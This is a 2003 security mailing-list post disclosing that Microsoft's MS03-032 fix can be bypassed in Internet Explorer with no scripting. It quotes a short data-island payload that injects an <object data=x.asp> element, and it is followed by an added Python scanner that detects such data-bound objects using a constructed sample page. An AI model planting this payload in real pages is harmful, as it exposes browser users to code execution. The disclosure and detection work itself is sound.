[VulnWatch] RE: BAD NEWS: Microsoft Security Bulletin MS03-032

From: GreyMagic Software (security_at_greymagic.com)
Date: 09/08/03

  • Next message: Marc Maiffret: "[VulnWatch] EEYE: Microsoft RPC Heap Corruption Vulnerability - Part II"
    To: "NTBugtraq" <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>, "Bugtraq" <bugtraq@securityfocus.com>, <full-disclosure@lists.netsys.com>, <vulnwatch@vulnwatch.org>
    Date: Mon, 8 Sep 2003 16:52:12 +0200
    
    

    >The patch for Drew's object data=funky.hta doesn't work:

    This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which
    explains the problem in detail. Microsoft again patches the object element
    in HTML, but it doesn't patch the dynamic version of that same element.

    >1. Disable Active Scripting

    This actually means that no scripting is needed at all in order to exploit
    this amazingly critical vulnerability:

    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
        <security>
            <exploit>
                <![CDATA[
                <object data=x.asp></object>
                ]]>
            </exploit>
        </security>
    </xml>

    Ouch.
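Added example, not GreyMagic's code and not part of the original post: a scanner that follows the IE data-binding indirection the post relies on (datasrc/datafld/dataformatas="html" pointing into an <xml> data island), so the data-bound <object data=...> is reported alongside the static element. The sample page, the second island oEsc with its entity-escaped field, and the URLs static.asp and y.asp are constructed for the example; the only fact it leans on is that CDATA and &lt;...&gt; produce the same XML text node, which is the value IE binds and, with dataformatas="html", renders as markup. The script-built variant described in gm001-ie is not covered here.

```python
"""Find <object data=...> elements delivered through IE data binding.

Added example (not GreyMagic's code). A check that only looks at the
static <object> element misses the same element when it arrives as a
data island field bound with
  <span datasrc="#id" datafld="field" dataformatas="html">
This scanner resolves that binding. SAMPLE below is constructed.
"""
import re
import xml.etree.ElementTree as ET

OBJECT_RE = re.compile(r"<object\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(
    r"""\b([a-z][a-z0-9-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
    re.IGNORECASE)
ISLAND_RE = re.compile(
    r"""<xml\b[^>]*\bid\s*=\s*["']?([^"'\s>]+)["']?[^>]*>(.*?)</xml\s*>""",
    re.IGNORECASE | re.DOTALL)
BINDING_RE = re.compile(r"<([a-z][a-z0-9]*)\b([^>]*\bdatasrc\s*=[^>]*)>",
                        re.IGNORECASE)


def _attrs(attr_text):
    """name=value pairs of one tag (quoted or bare), names lowercased."""
    out = {}
    for m in ATTR_RE.finditer(attr_text):
        out[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return out


def object_data_urls(fragment):
    """data= URL of every <object> tag literally present in a fragment."""
    return [_attrs(m.group(1))["data"] for m in OBJECT_RE.finditer(fragment)
            if "data" in _attrs(m.group(1))]


def naive_object_urls(html_doc):
    """What a plain grep for <object data=...> over the raw page sees."""
    return object_data_urls(html_doc)


def data_islands(html_doc):
    """Map island id -> {field: [text values]} for every <xml id=...> island.

    The island body is parsed as XML, so a field written as CDATA and one
    written with &lt;...&gt; entities yield the same text: that text is the
    bound value, and with dataformatas="html" IE renders it as markup.
    """
    islands = {}
    for m in ISLAND_RE.finditer(html_doc):
        root = ET.fromstring("<island>" + m.group(2) + "</island>")
        fields = {}
        for el in root.iter():
            if el is not root and len(el) == 0:      # leaf elements are fields
                fields.setdefault(el.tag, []).append((el.text or "").strip())
        islands[m.group(1)] = fields
    return islands


def bound_object_urls(html_doc):
    """(element, island id, field, url) for each <object> reached by binding."""
    islands = data_islands(html_doc)
    hits = []
    for m in BINDING_RE.finditer(html_doc):
        tag, a = m.group(1).lower(), _attrs(m.group(2))
        if a.get("dataformatas", "").lower() != "html":
            continue                     # text binding: markup is not rendered
        island_id = a.get("datasrc", "").lstrip("#")
        field = a.get("datafld", "")
        for value in islands.get(island_id, {}).get(field, []):
            for url in object_data_urls(value):
                hits.append((tag, island_id, field, url))
    return hits


def scan(html_doc):
    """URLs an <object> would load, split by delivery path."""
    return {"static": object_data_urls(ISLAND_RE.sub("", html_doc)),
            "data-bound": [h[3] for h in bound_object_urls(html_doc)]}


# Constructed sample: the post's island plus an entity-escaped one (oEsc)
# and a text-only binding that must not be reported.
SAMPLE = """<html><body>
<object data="static.asp"></object>
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
  <security><exploit><![CDATA[
    <object data=x.asp></object>
  ]]></exploit></security>
</xml>
<span datasrc="#oEsc" datafld="payload" dataformatas="html"></span>
<xml id="oEsc">
  <security><payload>&lt;object data=y.asp&gt;&lt;/object&gt;</payload></security>
</xml>
<span datasrc="#oEsc" datafld="payload"></span>
</body></html>"""

if __name__ == "__main__":
    print("naive grep :", naive_object_urls(SAMPLE))   # misses y.asp
    print("resolved   :", scan(SAMPLE))
```

The raw grep sees the CDATA copy only because the markup happens to be literal there; the entity-escaped island carries the same bound value and is invisible to it, while the resolving scan reports both and ignores the span that binds as text.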
